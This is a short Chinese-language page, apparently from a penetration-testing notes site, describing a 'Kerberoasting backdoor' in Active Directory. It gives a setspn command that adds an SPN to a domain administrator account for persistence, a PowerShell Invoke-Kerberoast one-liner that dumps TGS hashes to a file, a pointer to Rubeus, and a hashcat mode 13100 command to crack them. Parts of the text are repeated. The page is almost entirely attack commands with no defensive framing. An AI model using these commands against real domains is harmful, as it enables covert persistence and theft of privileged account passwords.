Kerberoasting后门
当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin
域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast
最后更新于
这有帮助吗?
当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast最后更新于
这有帮助吗?
这有帮助吗?
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt或使用rubeus.exe破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt